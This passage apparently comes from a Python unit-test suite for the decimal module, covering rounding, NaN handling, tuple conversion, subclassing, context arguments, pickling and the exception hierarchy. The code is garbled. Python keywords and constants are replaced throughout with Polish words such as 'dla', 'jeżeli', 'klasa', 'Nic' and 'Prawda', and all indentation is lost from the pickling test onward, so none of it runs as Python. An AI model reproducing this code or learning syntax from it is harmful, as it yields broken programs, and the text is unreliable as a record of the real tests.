    self.assertIs(min(small, large_int), small)
    self.assertIs(min(large_int, small), small)
    self.assertIs(max(small_int, large), large)
    self.assertIs(max(large, small_int), large)
def test_as_nonzero(self):
    """Decimal truthiness: zero is falsy, any nonzero value is truthy."""
    Decimal = self.decimal.Decimal
    self.assertNieprawda(Decimal(0))
    self.assertPrawda(Decimal('0.372'))
def test_tostring_methods(self):
    """str() yields the plain form; repr() wraps it as Decimal('...')."""
    Decimal = self.decimal.Decimal
    value = Decimal('15.32')
    self.assertEqual(str(value), '15.32')
    self.assertEqual(repr(value), "Decimal('15.32')")
def test_tonum_methods(self):
    # Test float and int methods, plus math.floor/math.ceil and round().
    Decimal = self.decimal.Decimal

    d1 = Decimal('66')
    d2 = Decimal('15.32')

    # int truncates toward zero
    self.assertEqual(int(d1), 66)
    self.assertEqual(int(d2), 15)

    # float
    self.assertEqual(float(d1), 66)
    self.assertEqual(float(d2), 15.32)

    # floor: rounds toward negative infinity
    test_pairs = [
        ('123.00', 123),
        ('3.2', 3),
        ('3.54', 3),
        ('3.899', 3),
        ('-2.3', -3),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('89891211712379812736.1', 89891211712379812736),
        ]
    dla d, i w test_pairs:
        self.assertEqual(math.floor(Decimal(d)), i)
    self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
    self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
    self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
    self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
    self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))

    # ceiling: rounds toward positive infinity
    test_pairs = [
        ('123.00', 123),
        ('3.2', 4),
        ('3.54', 4),
        ('3.899', 4),
        ('-2.3', -2),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('89891211712379812736.1', 89891211712379812737),
        ]
    dla d, i w test_pairs:
        self.assertEqual(math.ceil(Decimal(d)), i)
    self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
    self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
    self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
    self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
    self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))

    # round, single argument: banker's rounding (ties to even)
    test_pairs = [
        ('123.00', 123),
        ('3.2', 3),
        ('3.54', 4),
        ('3.899', 4),
        ('-2.3', -2),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('-3.5', -4),
        ('-2.5', -2),
        ('-1.5', -2),
        ('-0.5', 0),
        ('0.5', 0),
        ('1.5', 2),
        ('2.5', 2),
        ('3.5', 4),
        ]
    dla d, i w test_pairs:
        self.assertEqual(round(Decimal(d)), i)
    self.assertRaises(ValueError, round, Decimal('-NaN'))
    self.assertRaises(ValueError, round, Decimal('sNaN'))
    self.assertRaises(ValueError, round, Decimal('NaN123'))
    self.assertRaises(OverflowError, round, Decimal('Inf'))
    self.assertRaises(OverflowError, round, Decimal('-Inf'))

    # round, two arguments; this is essentially equivalent
    # to quantize, which is already extensively tested
    test_triples = [
        ('123.456', -4, '0E+4'),
        ('123.456', -3, '0E+3'),
        ('123.456', -2, '1E+2'),
        ('123.456', -1, '1.2E+2'),
        ('123.456', 0, '123'),
        ('123.456', 1, '123.5'),
        ('123.456', 2, '123.46'),
        ('123.456', 3, '123.456'),
        ('123.456', 4, '123.4560'),
        ('123.455', 2, '123.46'),
        ('123.445', 2, '123.44'),
        ('Inf', 4, 'NaN'),
        ('-Inf', -23, 'NaN'),
        ('sNaN314', 3, 'NaN314'),
        ]
    dla d, n, r w test_triples:
        self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
    # Test conversions of decimal NANs to float.
    # See http://bugs.python.org/issue15544
    Decimal = self.decimal.Decimal
    dla s w ('nan', 'nan1234', '-nan', '-nan2468'):
        f = float(Decimal(s))
        self.assertPrawda(math.isnan(f))
        # the sign of the quiet NaN must survive the conversion
        sign = math.copysign(1.0, f)
        self.assertEqual(sign, -1.0 jeżeli s.startswith('-') inaczej 1.0)
def test_snan_to_float(self):
    # Converting a signaling NaN to float must raise, never yield a qNaN.
    Decimal = self.decimal.Decimal
    dla s w ('snan', '-snan', 'snan1357', '-snan1234'):
        d = Decimal(s)
        self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
    """eval(repr(d)) must reconstruct an equal Decimal for varied values."""
    Decimal = self.decimal.Decimal

    # (sign, digits, exponent) triples covering zero, a negative integer,
    # a fractional value and a long high-precision coefficient.
    samples = [
        (0, (0,), 0),
        (1, (4, 5), 0),
        (0, (4, 5, 3, 4), -2),
        (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25),
    ]
    for triple in samples:
        d = Decimal(triple)
        self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
    """as_tuple() returns the canonical (sign, digits, exponent) triple."""
    Decimal = self.decimal.Decimal

    # (constructor argument, expected as_tuple() result)
    cases = [
        # zero
        (0, (0, (0,), 0)),
        # negative integer
        (-45, (1, (4, 5), 0)),
        # complicated string
        ("-4.34913534E-17", (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25)),
        # The '0' coefficient is implementation specific to decimal.py.
        # It has no meaning in the C-version and is ignored there.
        ("Infinity", (0, (0,), 'F')),
        # leading zeros in the coefficient are stripped
        ((0, (0, 0, 4, 0, 5, 3, 4), -2), (0, (4, 0, 5, 3, 4), -2)),
        ((1, (0, 0, 0), 37), (1, (0,), 37)),
        ((1, (), 37), (1, (0,), 37)),
        # leading zeros in NaN diagnostic info are stripped
        ((0, (0, 0, 4, 0, 5, 3, 4), 'n'), (0, (4, 0, 5, 3, 4), 'n')),
        ((1, (0, 0, 0), 'N'), (1, (), 'N')),
        ((1, (), 'n'), (1, (), 'n')),
        # For infinities, decimal.py has always silently accepted any
        # coefficient tuple.
        ((0, (0,), 'F'), (0, (0,), 'F')),
        ((0, (4, 5, 3, 4), 'F'), (0, (0,), 'F')),
        ((1, (0, 2, 7, 1), 'F'), (1, (0,), 'F')),
    ]
    for arg, expected in cases:
        self.assertEqual(Decimal(arg).as_tuple(), expected)
def test_subclassing(self):
    # Different behaviours when subclassing Decimal: arithmetic results
    # fall back to plain Decimal, while copy/deepcopy and the subclass
    # constructor preserve the subclass (but not its extra attributes).

    Decimal = self.decimal.Decimal

    klasa MyDecimal(Decimal):
        y = Nic

    d1 = MyDecimal(1)
    d2 = MyDecimal(2)
    # arithmetic on subclass instances returns the base class
    d = d1 + d2
    self.assertIs(type(d), Decimal)

    d = d1.max(d2)
    self.assertIs(type(d), Decimal)

    # copying keeps the subclass
    d = copy.copy(d1)
    self.assertIs(type(d), MyDecimal)
    self.assertEqual(d, d1)

    d = copy.deepcopy(d1)
    self.assertIs(type(d), MyDecimal)
    self.assertEqual(d, d1)

    # Decimal(Decimal)
    d = Decimal('1.0')
    x = Decimal(d)
    self.assertIs(type(x), Decimal)
    self.assertEqual(x, d)

    # MyDecimal(Decimal)
    m = MyDecimal(d)
    self.assertIs(type(m), MyDecimal)
    self.assertEqual(m, d)
    self.assertIs(m.y, Nic)

    # Decimal(MyDecimal)
    x = Decimal(m)
    self.assertIs(type(x), Decimal)
    self.assertEqual(x, d)

    # MyDecimal(MyDecimal): instance attributes are NOT carried over
    m.y = 9
    x = MyDecimal(m)
    self.assertIs(type(x), MyDecimal)
    self.assertEqual(x, d)
    self.assertIs(x.y, Nic)
def test_implicit_context(self):
    """Methods without an explicit context use the current one (issue 2478)."""
    Decimal = self.decimal.Decimal
    getcontext = self.decimal.getcontext

    current = getcontext()
    self.assertEqual(str(Decimal(0).sqrt()),
                     str(current.sqrt(Decimal(0))))
def test_none_args(self):
    # Passing context=None (and rounding=None) to every Decimal method
    # must mean "use the current thread's context/rounding", for unary,
    # binary and ternary operations alike.
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    localcontext = self.decimal.localcontext
    InvalidOperation = self.decimal.InvalidOperation
    DivisionByZero = self.decimal.DivisionByZero
    Overflow = self.decimal.Overflow
    Underflow = self.decimal.Underflow
    Subnormal = self.decimal.Subnormal
    Inexact = self.decimal.Inexact
    Rounded = self.decimal.Rounded
    Clamped = self.decimal.Clamped

    przy localcontext(Context()) jako c:
        c.prec = 7
        c.Emax = 999
        c.Emin = -999

        x = Decimal("111")
        y = Decimal("1e9999")   # overflows in this context
        z = Decimal("1e-9999")  # subnormal in this context

        ##### Unary functions
        c.clear_flags()
        self.assertEqual(str(x.exp(context=Nic)), '1.609487E+48')
        self.assertPrawda(c.flags[Inexact])
        self.assertPrawda(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(Overflow, y.exp, context=Nic)
        self.assertPrawda(c.flags[Overflow])

        self.assertIs(z.is_normal(context=Nic), Nieprawda)
        self.assertIs(z.is_subnormal(context=Nic), Prawda)

        c.clear_flags()
        self.assertEqual(str(x.ln(context=Nic)), '4.709530')
        self.assertPrawda(c.flags[Inexact])
        self.assertPrawda(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal(-1).ln, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(x.log10(context=Nic)), '2.045323')
        self.assertPrawda(c.flags[Inexact])
        self.assertPrawda(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal(-1).log10, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(x.logb(context=Nic)), '2')
        self.assertRaises(DivisionByZero, Decimal(0).logb, context=Nic)
        self.assertPrawda(c.flags[DivisionByZero])

        c.clear_flags()
        self.assertEqual(str(x.logical_invert(context=Nic)), '1111000')
        self.assertRaises(InvalidOperation, y.logical_invert, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(y.next_minus(context=Nic)), '9.999999E+999')
        self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(y.next_plus(context=Nic)), 'Infinity')
        self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(z.normalize(context=Nic)), '0')
        self.assertRaises(Overflow, y.normalize, context=Nic)
        self.assertPrawda(c.flags[Overflow])

        self.assertEqual(str(z.number_class(context=Nic)), '+Subnormal')

        c.clear_flags()
        self.assertEqual(str(z.sqrt(context=Nic)), '0E-1005')
        self.assertPrawda(c.flags[Clamped])
        self.assertPrawda(c.flags[Inexact])
        self.assertPrawda(c.flags[Rounded])
        self.assertPrawda(c.flags[Subnormal])
        self.assertPrawda(c.flags[Underflow])
        c.clear_flags()
        self.assertRaises(Overflow, y.sqrt, context=Nic)
        self.assertPrawda(c.flags[Overflow])

        # to_eng_string honours the current context's `capitals` setting
        c.capitals = 0
        self.assertEqual(str(z.to_eng_string(context=Nic)), '1e-9999')
        c.capitals = 1

        ##### Binary functions
        c.clear_flags()
        ans = str(x.compare(Decimal('Nan891287828'), context=Nic))
        self.assertEqual(ans, 'NaN1287828')
        self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.compare_signal(8224, context=Nic))
        self.assertEqual(ans, '-1')
        self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_and(101, context=Nic))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.logical_and, 123, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_or(101, context=Nic))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.logical_or, 123, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_xor(101, context=Nic))
        self.assertEqual(ans, '10')
        self.assertRaises(InvalidOperation, x.logical_xor, 123, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.max(101, context=Nic))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.max_mag(101, context=Nic))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.min(101, context=Nic))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.min_mag(101, context=Nic))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.remainder_near(101, context=Nic))
        self.assertEqual(ans, '10')
        self.assertRaises(InvalidOperation, y.remainder_near, 101, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.rotate(2, context=Nic))
        self.assertEqual(ans, '11100')
        self.assertRaises(InvalidOperation, x.rotate, 101, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.scaleb(7, context=Nic))
        self.assertEqual(ans, '1.11E+9')
        self.assertRaises(InvalidOperation, x.scaleb, 10000, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.shift(2, context=Nic))
        self.assertEqual(ans, '11100')
        self.assertRaises(InvalidOperation, x.shift, 10000, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        ##### Ternary functions
        c.clear_flags()
        ans = str(x.fma(2, 3, context=Nic))
        self.assertEqual(ans, '225')
        self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=Nic)
        self.assertPrawda(c.flags[Overflow])

        ##### Special cases
        # rounding=None falls back to the context's rounding mode
        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral(rounding=Nic, context=Nic))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral(rounding=Nic, context=Nic))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=Nic))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral_value(rounding=Nic, context=Nic))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral_value(rounding=Nic, context=Nic))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=Nic))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral_exact(rounding=Nic, context=Nic))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral_exact(rounding=Nic, context=Nic))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=Nic))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

        c.rounding = ROUND_UP
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=Nic, context=Nic))
        self.assertEqual(ans, '1.501')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=Nic, context=Nic))
        self.assertEqual(ans, '1.500')
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=Nic))
        self.assertEqual(ans, '1.501')
        c.clear_flags()
        self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=Nic)
        self.assertPrawda(c.flags[InvalidOperation])

    # localcontext(ctx=None) must copy the *current* context
    przy localcontext(Context()) jako context:
        context.prec = 7
        context.Emax = 999
        context.Emin = -999
        przy localcontext(ctx=Nic) jako c:
            self.assertEqual(c.prec, 7)
            self.assertEqual(c.Emax, 999)
            self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
    """Methods taking a second Decimal argument must also accept an int."""
    Decimal = self.decimal.Decimal

    # (receiver constructor argument, method name, other operand)
    cases = [
        (4, 'compare', 3),
        (4, 'compare_signal', 3),
        (4, 'compare_total', 3),
        (4, 'compare_total_mag', 3),
        (10101, 'logical_and', 1001),
        (10101, 'logical_or', 1001),
        (10101, 'logical_xor', 1001),
        (567, 'max', 123),
        (567, 'max_mag', 123),
        (567, 'min', 123),
        (567, 'min_mag', 123),
        (567, 'next_toward', 123),
        (1234, 'quantize', 100),
        (768, 'remainder_near', 1234),
        (123, 'rotate', 1),
        (1234, 'same_quantum', 1000),
        ('9.123', 'scaleb', -100),
        (456, 'shift', -1),
    ]
    for arg, name, other in cases:
        # Calling with a plain int must match calling with Decimal(int).
        method = getattr(Decimal(arg), name)
        self.assertEqual(method(other), method(Decimal(other)))

    # fma takes two extra operands; every int/Decimal mix must agree.
    expected = Decimal(-12).fma(Decimal(45), Decimal(67))
    self.assertEqual(Decimal(-12).fma(Decimal(45), 67), expected)
    self.assertEqual(Decimal(-12).fma(45, 67), expected)
    self.assertEqual(Decimal(-12).fma(45, Decimal(67)), expected)
klasa CUsabilityTest(UsabilityTest):
    # Run the usability suite against the C implementation (_decimal).
    decimal = C
klasa PyUsabilityTest(UsabilityTest):
    # Run the usability suite against the pure-Python implementation.
    decimal = P
klasa PythonAPItests(unittest.TestCase):
    # Tests of the Python-level API shared by both decimal implementations.

    def test_abc(self):
        # Decimal registers as a numbers.Number but deliberately not as
        # a numbers.Real.
        Decimal = self.decimal.Decimal

        self.assertPrawda(issubclass(Decimal, numbers.Number))
        self.assertNieprawda(issubclass(Decimal, numbers.Real))
        self.assertIsInstance(Decimal(0), numbers.Number)
        self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
dla proto w range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
jeżeli C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
dla x w range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same jako dla floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same jako to_integral w the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
dla x w range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same jako dla floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same jako to_integral w the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
klasa MyDecimal(Decimal):
dalej
self.assertPrawda(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertPrawda(MyDecimal.from_float(float('nan')).is_qnan())
self.assertPrawda(MyDecimal.from_float(float('inf')).is_infinite())
self.assertPrawda(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
dla i w range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
przy localcontext() jako c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertPrawda(xc.flags[InvalidOperation])
self.assertNieprawda(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertPrawda(xc.flags[Overflow])
self.assertNieprawda(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertPrawda(xc.flags[InvalidOperation])
self.assertNieprawda(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertPrawda(xc.flags[InvalidOperation])
self.assertNieprawda(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertPrawda(xc.flags[InvalidOperation])
self.assertNieprawda(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertNieprawda(D("0.01").is_normal(context=xc))
self.assertPrawda(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertPrawda(xc.flags[Overflow])
self.assertNieprawda(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertPrawda(issubclass(DecimalException, ArithmeticError))
self.assertPrawda(issubclass(InvalidOperation, DecimalException))
self.assertPrawda(issubclass(FloatOperation, DecimalException))
self.assertPrawda(issubclass(FloatOperation, TypeError))
self.assertPrawda(issubclass(DivisionByZero, DecimalException))
self.assertPrawda(issubclass(DivisionByZero, ZeroDivisionError))
self.assertPrawda(issubclass(Overflow, Rounded))
self.assertPrawda(issubclass(Overflow, Inexact))
self.assertPrawda(issubclass(Overflow, DecimalException))
self.assertPrawda(issubclass(Underflow, Inexact))
self.assertPrawda(issubclass(Underflow, Rounded))
self.assertPrawda(issubclass(Underflow, Subnormal))
self.assertPrawda(issubclass(Underflow, DecimalException))
self.assertPrawda(issubclass(Subnormal, DecimalException))
self.assertPrawda(issubclass(Inexact, DecimalException))
self.assertPrawda(issubclass(Rounded, DecimalException))
self.assertPrawda(issubclass(Clamped, DecimalException))
self.assertPrawda(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertPrawda(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertPrawda(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertPrawda(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
